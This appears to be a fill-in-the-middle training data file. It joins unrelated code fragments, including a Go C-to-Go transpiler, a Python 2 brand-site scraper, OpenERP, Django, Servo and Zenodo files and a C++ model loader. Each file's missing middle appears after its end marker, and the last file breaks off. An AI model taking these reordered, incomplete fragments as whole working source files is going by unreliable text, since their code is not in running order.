# non-false value, then it is used: |
<|file_name|>entry.config.js<|end_file_name|><|fim▁begin|>import merge from 'webpack-merge'
import { isString } from '../../utils'<|fim▁hole|> }
if (Array.isArray(settings)) {
return merge.smart(config, { entry: settings })
}
throw new Error('Unexpected webpack entry value')
}<|fim▁end|> |
export default (config, settings) => {
if (isString(settings)) {
return merge.smart(config, { entry: [settings] }) |
<|file_name|>binary.go<|end_file_name|><|fim▁begin|>// This file contains functions for transpiling binary operator expressions.
package transpiler
import (
"fmt"
goast "go/ast"
"go/token"
"strings"
"github.com/elliotchance/c2go/ast"
"github.com/elliotchance/c2go/program"
"github.com/elliotchance/c2go/types"
"github.com/elliotchance/c2go/util"
)
// Comma problem. Example:
// for (int i=0,j=0;i+=1,j<5;i++,j++){...}
// For solving - we have to separate the
// binary operator "," to 2 parts:
// part 1(pre ): left part - typically one or more some expessions
// part 2(stmt): right part - always only one expression, with or witout
// logical operators like "==", "!=", ...
func transpileBinaryOperatorComma(n *ast.BinaryOperator, p *program.Program) (
stmt goast.Stmt, preStmts []goast.Stmt, err error) {
defer func() {
if err != nil {
err = fmt.Errorf("Cannot transpile operator comma : err = %v", err)
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}()
left, err := transpileToStmts(n.Children()[0], p)
if err != nil {
return nil, nil, err
}
right, err := transpileToStmts(n.Children()[1], p)
if err != nil {
return nil, nil, err
}
if left == nil || right == nil {
return nil, nil, fmt.Errorf("Cannot transpile binary operator comma: right = %v , left = %v", right, left)
}
preStmts = append(preStmts, left...)
preStmts = append(preStmts, right...)
if len(preStmts) >= 2 {
return preStmts[len(preStmts)-1], preStmts[:len(preStmts)-1], nil
}
if len(preStmts) == 1 {
return preStmts[0], nil, nil
}
return nil, nil, nil
}
func transpileBinaryOperator(n *ast.BinaryOperator, p *program.Program, exprIsStmt bool) (
expr goast.Expr, eType string, preStmts []goast.Stmt, postStmts []goast.Stmt, err error) {
defer func() {
if err != nil {
err = fmt.Errorf("Cannot transpile BinaryOperator with type '%s' : result type = {%s}. Error: %v", n.Type, eType, err)
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}()
operator := getTokenForOperator(n.Operator)
// Char overflow
// BinaryOperator 0x2b74458 <line:506:7, col:18> 'int' '!='
// |-ImplicitCastExpr 0x2b74440 <col:7, col:10> 'int' <IntegralCast>
// | `-ImplicitCastExpr 0x2b74428 <col:7, col:10> 'char' <LValueToRValue>
// | `-...
// `-ParenExpr 0x2b74408 <col:15, col:18> 'int'
// `-UnaryOperator 0x2b743e8 <col:16, col:17> 'int' prefix '-'
// `-IntegerLiteral 0x2b743c8 <col:17> 'int' 1
if n.Operator == "!=" {
var leftOk bool
if l0, ok := n.ChildNodes[0].(*ast.ImplicitCastExpr); ok && l0.Type == "int" {
if len(l0.ChildNodes) > 0 {
if l1, ok := l0.ChildNodes[0].(*ast.ImplicitCastExpr); ok && l1.Type == "char" {
leftOk = true
}
}
}
if leftOk {
if r0, ok := n.ChildNodes[1].(*ast.ParenExpr); ok && r0.Type == "int" {
if len(r0.ChildNodes) > 0 {
if r1, ok := r0.ChildNodes[0].(*ast.UnaryOperator); ok && r1.IsPrefix && r1.Operator == "-" {
if r2, ok := r1.ChildNodes[0].(*ast.IntegerLiteral); ok && r2.Type == "int" {
r0.ChildNodes[0] = &ast.BinaryOperator{
Type: "int",
Type2: "int",
Operator: "+",
ChildNodes: []ast.Node{
r1,
&ast.IntegerLiteral{
Type: "int",
Value: "256",
},
},
}
}
}
}
}
}
}
// Example of C code
// a = b = 1
// // Operation equal transpile from right to left
// Solving:
// b = 1, a = b
// // Operation comma tranpile from left to right
// If we have for example:
// a = b = c = 1<|fim▁hole|> // |-----------|
// this part, created in according to
// recursive working
// Example of AST tree for problem:
// |-BinaryOperator 0x2f17870 <line:13:2, col:10> 'int' '='
// | |-DeclRefExpr 0x2f177d8 <col:2> 'int' lvalue Var 0x2f176d8 'x' 'int'
// | `-BinaryOperator 0x2f17848 <col:6, col:10> 'int' '='
// | |-DeclRefExpr 0x2f17800 <col:6> 'int' lvalue Var 0x2f17748 'y' 'int'
// | `-IntegerLiteral 0x2f17828 <col:10> 'int' 1
//
// Example of AST tree for solution:
// |-BinaryOperator 0x368e8d8 <line:13:2, col:13> 'int' ','
// | |-BinaryOperator 0x368e820 <col:2, col:6> 'int' '='
// | | |-DeclRefExpr 0x368e7d8 <col:2> 'int' lvalue Var 0x368e748 'y' 'int'
// | | `-IntegerLiteral 0x368e800 <col:6> 'int' 1
// | `-BinaryOperator 0x368e8b0 <col:9, col:13> 'int' '='
// | |-DeclRefExpr 0x368e848 <col:9> 'int' lvalue Var 0x368e6d8 'x' 'int'
// | `-ImplicitCastExpr 0x368e898 <col:13> 'int' <LValueToRValue>
// | `-DeclRefExpr 0x368e870 <col:13> 'int' lvalue Var 0x368e748 'y' 'int'
if getTokenForOperator(n.Operator) == token.ASSIGN {
switch c := n.Children()[1].(type) {
case *ast.BinaryOperator:
if getTokenForOperator(c.Operator) == token.ASSIGN {
bSecond := ast.BinaryOperator{
Type: c.Type,
Operator: "=",
}
bSecond.AddChild(n.Children()[0])
var impl ast.ImplicitCastExpr
impl.Type = c.Type
impl.Kind = "LValueToRValue"
impl.AddChild(c.Children()[0])
bSecond.AddChild(&impl)
var bComma ast.BinaryOperator
bComma.Operator = ","
bComma.Type = c.Type
bComma.AddChild(c)
bComma.AddChild(&bSecond)
// goast.NewBinaryExpr takes care to wrap any AST children safely in a closure, if needed.
return transpileBinaryOperator(&bComma, p, exprIsStmt)
}
}
}
// Example of C code
// a = 1, b = a
// Solving
// a = 1; // preStmts
// b = a; // n
// Example of AST tree for problem:
// |-BinaryOperator 0x368e8d8 <line:13:2, col:13> 'int' ','
// | |-BinaryOperator 0x368e820 <col:2, col:6> 'int' '='
// | | |-DeclRefExpr 0x368e7d8 <col:2> 'int' lvalue Var 0x368e748 'y' 'int'
// | | `-IntegerLiteral 0x368e800 <col:6> 'int' 1
// | `-BinaryOperator 0x368e8b0 <col:9, col:13> 'int' '='
// | |-DeclRefExpr 0x368e848 <col:9> 'int' lvalue Var 0x368e6d8 'x' 'int'
// | `-ImplicitCastExpr 0x368e898 <col:13> 'int' <LValueToRValue>
// | `-DeclRefExpr 0x368e870 <col:13> 'int' lvalue Var 0x368e748 'y' 'int'
//
// Example of AST tree for solution:
// |-BinaryOperator 0x21a7820 <line:13:2, col:6> 'int' '='
// | |-DeclRefExpr 0x21a77d8 <col:2> 'int' lvalue Var 0x21a7748 'y' 'int'
// | `-IntegerLiteral 0x21a7800 <col:6> 'int' 1
// |-BinaryOperator 0x21a78b0 <line:14:2, col:6> 'int' '='
// | |-DeclRefExpr 0x21a7848 <col:2> 'int' lvalue Var 0x21a76d8 'x' 'int'
// | `-ImplicitCastExpr 0x21a7898 <col:6> 'int' <LValueToRValue>
// | `-DeclRefExpr 0x21a7870 <col:6> 'int' lvalue Var 0x21a7748 'y' 'int'
if getTokenForOperator(n.Operator) == token.COMMA {
stmts, _, newPre, newPost, err := transpileToExpr(n.Children()[0], p, exprIsStmt)
if err != nil {
return nil, "unknown50", nil, nil, err
}
preStmts = append(preStmts, newPre...)
preStmts = append(preStmts, util.NewExprStmt(stmts))
preStmts = append(preStmts, newPost...)
var st string
stmts, st, newPre, newPost, err = transpileToExpr(n.Children()[1], p, exprIsStmt)
if err != nil {
return nil, "unknown51", nil, nil, err
}
// Theoretically , we don't have any preStmts or postStmts
// from n.Children()[1]
if len(newPre) > 0 || len(newPost) > 0 {
p.AddMessage(p.GenerateWarningMessage(
fmt.Errorf("Not support length pre or post stmts: {%d,%d}", len(newPre), len(newPost)), n))
}
return stmts, st, preStmts, postStmts, nil
}
left, leftType, newPre, newPost, err := atomicOperation(n.Children()[0], p)
if err != nil {
return nil, "unknown52", nil, nil, err
}
preStmts, postStmts = combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
right, rightType, newPre, newPost, err := atomicOperation(n.Children()[1], p)
if err != nil {
return nil, "unknown53", nil, nil, err
}
var adjustPointerDiff int
if types.IsPointer(p, leftType) && types.IsPointer(p, rightType) &&
(operator == token.SUB ||
operator == token.LSS || operator == token.GTR ||
operator == token.LEQ || operator == token.GEQ) {
baseSize, err := types.SizeOf(p, types.GetBaseType(leftType))
if operator == token.SUB && err == nil && baseSize > 1 {
adjustPointerDiff = baseSize
}
left, leftType, err = GetUintptrForPointer(p, left, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
right, rightType, err = GetUintptrForPointer(p, right, rightType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
if types.IsPointer(p, leftType) && types.IsPointer(p, rightType) &&
(operator == token.EQL || operator == token.NEQ) &&
leftType != "NullPointerType *" && rightType != "NullPointerType *" {
left, leftType, err = GetUintptrForPointer(p, left, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
right, rightType, err = GetUintptrForPointer(p, right, rightType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
preStmts, postStmts = combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
returnType := types.ResolveTypeForBinaryOperator(p, n.Operator, leftType, rightType)
if operator == token.LAND || operator == token.LOR {
left, err = types.CastExpr(p, left, leftType, "bool")
p.AddMessage(p.GenerateWarningOrErrorMessage(err, n, left == nil))
if left == nil {
left = util.NewNil()
}
right, err = types.CastExpr(p, right, rightType, "bool")
p.AddMessage(p.GenerateWarningOrErrorMessage(err, n, right == nil))
if right == nil {
right = util.NewNil()
}
resolvedLeftType, err := types.ResolveType(p, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
expr := util.NewBinaryExpr(left, operator, right, resolvedLeftType, exprIsStmt)
return expr, "bool", preStmts, postStmts, nil
}
// The right hand argument of the shift left or shift right operators
// in Go must be unsigned integers. In C, shifting with a negative shift
// count is undefined behaviour (so we should be able to ignore that case).
// To handle this, cast the shift count to a uint64.
if operator == token.SHL || operator == token.SHR {
right, err = types.CastExpr(p, right, rightType, "unsigned long long")
p.AddMessage(p.GenerateWarningOrErrorMessage(err, n, right == nil))
if right == nil {
right = util.NewNil()
}
return util.NewBinaryExpr(left, operator, right, "uint64", exprIsStmt),
leftType, preStmts, postStmts, nil
}
// pointer arithmetic
if types.IsPointer(p, n.Type) {
if operator == token.ADD || operator == token.SUB {
if types.IsPointer(p, leftType) {
expr, eType, newPre, newPost, err =
pointerArithmetic(p, left, leftType, right, rightType, operator)
} else {
expr, eType, newPre, newPost, err =
pointerArithmetic(p, right, rightType, left, leftType, operator)
}
if err != nil {
return
}
if expr == nil {
return nil, "", nil, nil, fmt.Errorf("Expr is nil")
}
preStmts, postStmts =
combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
return
}
}
if operator == token.NEQ || operator == token.EQL ||
operator == token.LSS || operator == token.GTR ||
operator == token.LEQ || operator == token.GEQ ||
operator == token.AND || operator == token.ADD ||
operator == token.SUB || operator == token.MUL ||
operator == token.QUO || operator == token.REM {
// We may have to cast the right side to the same type as the left
// side. This is a bit crude because we should make a better
// decision of which type to cast to instead of only using the type
// of the left side.
if rightType != types.NullPointer {
right, err = types.CastExpr(p, right, rightType, leftType)
rightType = leftType
p.AddMessage(p.GenerateWarningOrErrorMessage(err, n, right == nil))
}
}
if operator == token.ASSIGN {
// Memory allocation is translated into the Go-style.
allocSize := getAllocationSizeNode(p, n.Children()[1])
if allocSize != nil {
right, newPre, newPost, err = generateAlloc(p, allocSize, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
return nil, "", nil, nil, err
}
preStmts, postStmts = combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
} else {
right, err = types.CastExpr(p, right, rightType, returnType)
if p.AddMessage(p.GenerateWarningMessage(err, n)) && right == nil {
right = util.NewNil()
}
}
}
if operator == token.ADD_ASSIGN || operator == token.SUB_ASSIGN {
right, err = types.CastExpr(p, right, rightType, returnType)
}
var resolvedLeftType = n.Type
if !types.IsFunction(n.Type) && !types.IsTypedefFunction(p, n.Type) {
resolvedLeftType, err = types.ResolveType(p, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
// Enum casting
if operator != token.ASSIGN && strings.Contains(leftType, "enum") {
left, err = types.CastExpr(p, left, leftType, "int")
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
// Enum casting
if operator != token.ASSIGN && strings.Contains(rightType, "enum") {
right, err = types.CastExpr(p, right, rightType, "int")
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
if left == nil {
err = fmt.Errorf("left part of binary operation is nil. left : %#v", n.Children()[0])
p.AddMessage(p.GenerateWarningMessage(err, n))
return nil, "", nil, nil, err
}
if right == nil {
err = fmt.Errorf("right part of binary operation is nil. right : %#v", n.Children()[1])
p.AddMessage(p.GenerateWarningMessage(err, n))
return nil, "", nil, nil, err
}
if adjustPointerDiff > 0 {
expr := util.NewBinaryExpr(left, operator, right, resolvedLeftType, exprIsStmt)
returnType = types.ResolveTypeForBinaryOperator(p, n.Operator, leftType, rightType)
return util.NewBinaryExpr(expr, token.QUO, util.NewIntLit(adjustPointerDiff), returnType, exprIsStmt),
returnType,
preStmts, postStmts, nil
}
return util.NewBinaryExpr(left, operator, right, resolvedLeftType, exprIsStmt),
types.ResolveTypeForBinaryOperator(p, n.Operator, leftType, rightType),
preStmts, postStmts, nil
}
func foundCallExpr(n ast.Node) *ast.CallExpr {
switch v := n.(type) {
case *ast.ImplicitCastExpr, *ast.CStyleCastExpr:
return foundCallExpr(n.Children()[0])
case *ast.CallExpr:
return v
}
return nil
}
// getAllocationSizeNode returns the node that, if evaluated, would return the
// size (in bytes) of a memory allocation operation. For example:
//
// (int *)malloc(sizeof(int))
//
// Would return the node that represents the "sizeof(int)".
//
// If the node does not represent an allocation operation (such as calling
// malloc, calloc, realloc, etc.) then nil is returned.
//
// In the case of calloc() it will return a new BinaryExpr that multiplies both
// arguments.
func getAllocationSizeNode(p *program.Program, node ast.Node) ast.Node {
expr := foundCallExpr(node)
if expr == nil || expr == (*ast.CallExpr)(nil) {
return nil
}
functionName, _ := getNameOfFunctionFromCallExpr(p, expr)
if functionName == "malloc" {
// Is 1 always the body in this case? Might need to be more careful
// to find the correct node.
return expr.Children()[1]
}
if functionName == "calloc" {
return &ast.BinaryOperator{
Type: "int",
Operator: "*",
ChildNodes: expr.Children()[1:],
}
}
// TODO: realloc() is not supported
// https://github.com/elliotchance/c2go/issues/118
//
// Realloc will be treated as calloc which will almost certainly cause
// bugs in your code.
if functionName == "realloc" {
return expr.Children()[2]
}
return nil
}
func generateAlloc(p *program.Program, allocSize ast.Node, leftType string) (
right goast.Expr, preStmts []goast.Stmt, postStmts []goast.Stmt, err error) {
allocSizeExpr, allocType, newPre, newPost, err := transpileToExpr(allocSize, p, false)
preStmts, postStmts = combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
if err != nil {
return nil, preStmts, postStmts, err
}
toType, err := types.ResolveType(p, leftType)
if err != nil {
return nil, preStmts, postStmts, err
}
allocSizeExpr, err = types.CastExpr(p, allocSizeExpr, allocType, "int")
if err != nil {
return nil, preStmts, postStmts, err
}
right = util.NewCallExpr(
"noarch.Malloc",
allocSizeExpr,
)
if toType != "unsafe.Pointer" {
right = &goast.CallExpr{
Fun: &goast.ParenExpr{
X: util.NewTypeIdent(toType),
},
Args: []goast.Expr{right},
}
}
return
}<|fim▁end|> | // then solution is:
// c = 1, b = c, a = b |
<|file_name|>brand1.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import urllib2
import re
import json
class Spider:
def __init__(self):
self.url = 'http://brand.efu.com.cn/'
self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'
self.headers = { 'User-Agent' : self.user_agent }
def getBrandCategory(self):
f = open('brand1.csv','a')
f.write('品牌,目标消费群体,分类\n')
f.close()
content = self.getPageContext(self.url)
items = self.resolveIndexContent(content)
for line in items:
context = [line[0]]
# 循环遍历每一个分类下的页码
url = line[1]
for num in range(1,1000):
nexturl = self.url+url[:-6]+str(num)+".html" # 拼接每一页的url
pageContent = self.getPageContext(nexturl) # 爬取分页的内容
# 判断此页是否有内容
if pageContent.find('<div class="lstPhotob">') == -1:
break
# 处理分页页面内容
pageItems = self.resolvePageContent(pageContent,context[0])
if len(pageItems) == 0:
break
for pageLine in pageItems:
# print pageLine[0]
# print pageLine[1]
brandContent = self.getPageContext(pageLine[0])
brandItems = self.resolveBrandContext(brandContent)<|fim▁hole|> if len(brandItems) == 0:
break
f = open('brand1.csv','a')
for brandLine in brandItems:
if brandLine[0] == '目标消费群体':
output = str(pageLine[1])+","+str(brandLine[1])+","+str(line[0])
print output
f.write(output)
f.write("\n")
break
f.close()
def resolveBrandContext(self,content):
# [\s\S]+?
try:
pattern = re.compile('.*?<span class="sp-a">(.*?)</span>.*?<span class="sp-b">(.*?)</span>.*?')
return re.findall(pattern,content)
except:
# print '忽略解析品牌页面出错问题'
return []
def resolveIndexContent(self,content):
try:
pattern = re.compile('.*?<li><a title="(.*?)" href="(.*?)">.*?</a></li>.*?')
return re.findall(pattern,content)
except:
# print '忽略解析首页出错问题'
return []
def resolvePageContent(self,content,category):
# pattern = re.compile('.*?<div class="lstPhotob"><div class="lstPa"><div class="lstPa-a"><a href="(.*?)" target="_blank" title="(.*?)>.*?')
try:
pattern = re.compile('.*?<a href="(.*?)" target="_blank" title="(.*?)'+category+'品牌">.*?')
return re.findall(pattern,content)
except:
# print '忽略解析分页页面出错问题'
return []
def getPageContext(self,url):
# print '爬取页面',url
try:
request = urllib2.Request(url,headers = self.headers)
response = urllib2.urlopen(request)
return response.read()
except:
1
# print '忽略url发送出错问题'
def run(self):
self.getBrandCategory()
spider = Spider()
spider.run()<|fim▁end|> | |
<|file_name|>product.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2012 Vauxoo - http://www.vauxoo.com
# All Rights Reserved.
# [email protected]
############################################################################
# Coded by: Rodo ([email protected]),Moy ([email protected])
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from openerp.tools.translate import _
class product_product(orm.Model):
_inherit = "product.product"
_columns = {
'product_customer_code_ids': fields.one2many('product.customer.code',
'product_id',
'Customer Codes'),
}
def copy(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
default['product_customer_code_ids'] = False<|fim▁hole|> return res
def name_search(self, cr, user, name='', args=None, operator='ilike',
context=None, limit=80):
res = super(product_product, self).name_search(
cr, user, name, args, operator, context, limit)
if not context:
context = {}
product_customer_code_obj = self.pool.get('product.customer.code')
if not res:
ids = []
partner_id = context.get('partner_id', False)
if partner_id:
id_prod_code = \
product_customer_code_obj.search(cr, user,
[('product_code',
'=', name),
('partner_id', '=',
partner_id)],
limit=limit,
context=context)
# TODO: Search for product customer name
id_prod = id_prod_code and product_customer_code_obj.browse(
cr, user, id_prod_code, context=context) or []
for ppu in id_prod:
ids.append(ppu.product_id.id)
if ids:
res = self.name_get(cr, user, ids, context)
return res<|fim▁end|> | res = super(product_product, self).copy(
cr, uid, id, default=default, context=context) |
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#![feature(box_syntax)]
#![feature(iter_cmp)]
#![feature(slice_bytes)]
#![feature(vec_push_all)]
#![feature(plugin)]
#![plugin(plugins)]
#![deny(unsafe_code)]
#[macro_use]
extern crate log;
#[macro_use]
extern crate profile_traits;
#[macro_use]
extern crate util;
extern crate azure;
extern crate canvas;
extern crate canvas_traits;
extern crate clipboard;
#[cfg(target_os = "macos")]
extern crate core_graphics;
#[cfg(target_os = "macos")]
extern crate core_text;
extern crate devtools_traits;
extern crate euclid;
extern crate gfx;
extern crate gfx_traits;
extern crate gleam;
extern crate ipc_channel;
extern crate layers;
extern crate layout_traits;
extern crate msg;<|fim▁hole|>extern crate png;
extern crate script_traits;
extern crate style_traits;
extern crate time;
extern crate url;
pub use compositor_task::{CompositorEventListener, CompositorProxy, CompositorTask};
pub use constellation::Constellation;
mod compositor;
mod compositor_layer;
mod headless;
mod scrolling;
mod surface_map;
pub mod compositor_task;
pub mod constellation;
pub mod pipeline;
pub mod windowing;<|fim▁end|> | extern crate net_traits;
extern crate num;
extern crate offscreen_gl_context; |
<|file_name|>0004_groupround_schedule_is_set.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-06 02:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('season', '0003_auto_20161206_0216'),
]
operations = [
migrations.AddField(
model_name='groupround',
name='schedule_is_set',
field=models.BooleanField(default=False),<|fim▁hole|><|fim▁end|> | ),
] |
<|file_name|>package_report.py<|end_file_name|><|fim▁begin|>import sublime
import sublime_plugin
<|fim▁hole|>from ..core import oa_syntax, decorate_pkg_name
from ..core import ReportGenerationThread
from ...lib.packages import PackageList
###----------------------------------------------------------------------------
class PackageReportThread(ReportGenerationThread):
"""
Generate a tabular report of all installed packages and their state.
"""
def _process(self):
pkg_list = PackageList()
pkg_counts = pkg_list.package_counts()
title = "{} Total Packages".format(len(pkg_list))
t_sep = "=" * len(title)
fmt = '{{:>{}}}'.format(len(str(max(pkg_counts))))
stats = ("{0} [S]hipped with Sublime\n"
"{0} [I]nstalled (user) sublime-package files\n"
"{0} [U]npacked in Packages\\ directory\n"
"{0} Currently in ignored_packages\n"
"{0} Installed Dependencies\n").format(fmt).format(*pkg_counts)
row = "| {:<40} | {:3} | {:3} | {:<3} |".format("", "", "", "")
r_sep = "+------------------------------------------+-----+-----+-----+"
packages = {}
result = [title, t_sep, "", self._generation_time(), stats, r_sep]
for pkg_name, pkg_info in pkg_list:
packages[pkg_name] = pkg_info.status(detailed=False)
result.append(
"| {:<40} | [{:1}] | [{:1}] | [{:1}] |".format(
decorate_pkg_name(pkg_info, name_only=True),
"S" if pkg_info.shipped_path is not None else " ",
"I" if pkg_info.installed_path is not None else " ",
"U" if pkg_info.unpacked_path is not None else " "))
result.extend([r_sep, ""])
self._set_content("OverrideAudit: Package Report", result, ":packages",
oa_syntax("OA-PkgReport"), {
"override_audit_report_packages": packages,
"context_menu": "OverrideAuditReport.sublime-menu"
})
###----------------------------------------------------------------------------
class OverrideAuditPackageReportCommand(sublime_plugin.WindowCommand):
"""
Generate a tabular report of all installed packages and their state.
"""
def run(self, force_reuse=False):
PackageReportThread(self.window, "Generating Package Report",
self.window.active_view(),
force_reuse=force_reuse).start()
###----------------------------------------------------------------------------
#<|fim▁end|> | |
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.shortcuts import render
# Create your views here.
def proindex(request):
return render(request, 'example/probase.html' )
def index(request):
return render(request, 'e_index.html' )
def badges_labels(request):
return render(request, 'badges_labels.html' )
def four(request):
return render(request, '404.html' )
def five(request):
return render(request, '500.html' )
def basic_gallery(request):
return render(request, 'basic_gallery.html' )
def buttons(request):
return render(request, 'buttons.html' )
def calendar(request):
return render(request, 'calendar.html' )
def carousel(request):
return render(request, 'carousel.html' )
def chat_view(request):
return render(request, 'chat_view.html' )
def code_editor(request):
return render(request, 'code_editor.html' )
def contacts(request):
return render(request, 'contacts.html' )
def css_animation(request):
return render(request, 'css_animation.html' )
def draggable_panels(request):
return render(request, 'draggable_panels.html' )
def empty_page(request):
return render(request, 'empty_page.html' )
def faq(request):
return render(request, 'faq.html' )
def file_manager(request):
return render(request, 'file_manager.html' )
def form_advanced(request):
return render(request, 'form_advanced.html' )
def form_avatar(request):
return render(request, 'form_avatar.html' )
def form_basic(request):
return render(request, 'form_basic.html' )
def form_builder(request):
return render(request, 'form_builder.html' )
def form_editors(request):
return render(request, 'form_editors.html' )
def form_file_upload(request):
return render(request, 'form_file_upload.html' )
def form_markdown(request):
return render(request, 'form_markdown.html' )
def form_simditor(request):
return render(request, 'form_simditor.html' )
def form_validate(request):
return render(request, 'form_validate.html' )
def form_webuploader(request):
return render(request, 'form_webuploader.html' )
def form_wizard(request):
return render(request, 'form_wizard.html' )
def forum_main(request):
return render(request, 'forum_main.html' )
def graph_echarts(request):
return render(request, 'graph_echarts.html' )
def graph_flot(request):
return render(request, 'graph_flot.html' )
def graph_morris(request):
return render(request, 'graph_morris.html' )<|fim▁hole|>
return render(request, 'graph_peity.html' )
def graph_rickshaw(request):
return render(request, 'graph_rickshaw.html' )
def graph_sparkline(request):
return render(request, 'graph_sparkline.html' )
def grid_options(request):
return render(request, 'grid_options.html' )
def iconfont(request):
return render(request, 'iconfont.html' )
def icons(request):
return render(request, 'icons.html' )
def index_1(request):
return render(request, 'index_1.html' )
def index_2(request):
return render(request, 'index_2.html' )
def index_3(request):
return render(request, 'index_3.html' )
def index_4(request):
return render(request, 'index_4.html' )
def invoice(request):
return render(request, 'invoice.html' )
def invoice_print(request):
return render(request, 'invoice_print.html' )
def layer(request):
return render(request, 'layer.html' )
def layerdate(request):
return render(request, 'layerdate.html' )
def layouts(request):
return render(request, 'layouts.html' )
def lockscreen(request):
return render(request, 'lockscreen.html' )
def login(request):
return render(request, 'login.html' )
def mailbox(request):
return render(request, 'mailbox.html' )
def mail_compose(request):
return render(request, 'mail_compose.html' )
def mail_detail(request):
return render(request, 'mail_detail.html' )
def modal_window(request):
return render(request, 'modal_window.html' )
def nestable_list(request):
return render(request, 'nestable_list.html' )
def notifications(request):
return render(request, 'notifications.html' )
def pin_board(request):
return render(request, 'pin_board.html' )
def profile(request):
return render(request, 'profile.html' )
def projects(request):
return render(request, 'projects.html' )
def project_detail(request):
return render(request, 'project_detail.html' )
def register(request):
return render(request, 'register.html' )
def search_results(request):
return render(request, 'search_results.html' )
def table_basic(request):
return render(request, 'table_basic.html' )
def table_data_tables(request):
return render(request, 'table_data_tables.html' )
def table_jqgrid(request):
return render(request, 'table_jqgrid.html' )
def tabs_panels(request):
return render(request, 'tabs_panels.html' )
def timeline(request):
return render(request, 'timeline.html' )
def timeline_v2(request):
return render(request, 'timeline_v2.html' )
def toastr_notifications(request):
return render(request, 'toastr_notifications.html' )
def tree_view(request):
return render(request, 'tree_view.html' )
def tree_view_v2(request):
return render(request, 'tree_view_v2.html' )
def typography(request):
return render(request, 'typography.html' )
def validation(request):
return render(request, 'validation.html' )
def webim(request):
return render(request, 'webim.html' )
def widgets(request):
return render(request, 'widgets.html' )<|fim▁end|> |
def graph_peity(request): |
<|file_name|>config.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2015 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Configuration for Zenodo Records."""
from __future__ import absolute_import, print_function
from flask_babelex import gettext
from speaklater import make_lazy_gettext
_ = make_lazy_gettext(lambda: gettext)
ZENODO_COMMUNITIES_AUTO_ENABLED = True
"""Automatically add and request to communities upon publishing."""
ZENODO_COMMUNITIES_AUTO_REQUEST = ['zenodo', ]
"""Communities which are to be auto-requested upon first publishing."""<|fim▁hole|>"""Communities which are to be auto-requested if record has grants."""
ZENODO_COMMUNITIES_ADD_IF_GRANTS = []
"""Communities which are to be auto-added if record has grants."""
ZENODO_BUCKET_QUOTA_SIZE = 50 * 1000 * 1000 * 1000 # 50 GB
"""Maximum quota per bucket."""
ZENODO_MAX_FILE_SIZE = ZENODO_BUCKET_QUOTA_SIZE
"""Maximum file size accepted."""<|fim▁end|> |
ZENODO_COMMUNITIES_REQUEST_IF_GRANTS = ['ecfunded', ] |
<|file_name|>r_model_alias.cpp<|end_file_name|><|fim▁begin|>/**
* @file
* @brief shared alias model loading code (md2, md3)
*/
/*
Copyright (C) 1997-2001 Id Software, Inc.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License<|fim▁hole|>
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*/
#include "r_local.h"
#include "../../shared/parse.h"
#include "r_state.h"
/*
==============================================================================
ALIAS MODELS
==============================================================================
*/
void R_ModLoadAnims (mAliasModel_t *mod, const char *animname)
{
const char *text, *token;
mAliasAnim_t *anim;
int n;
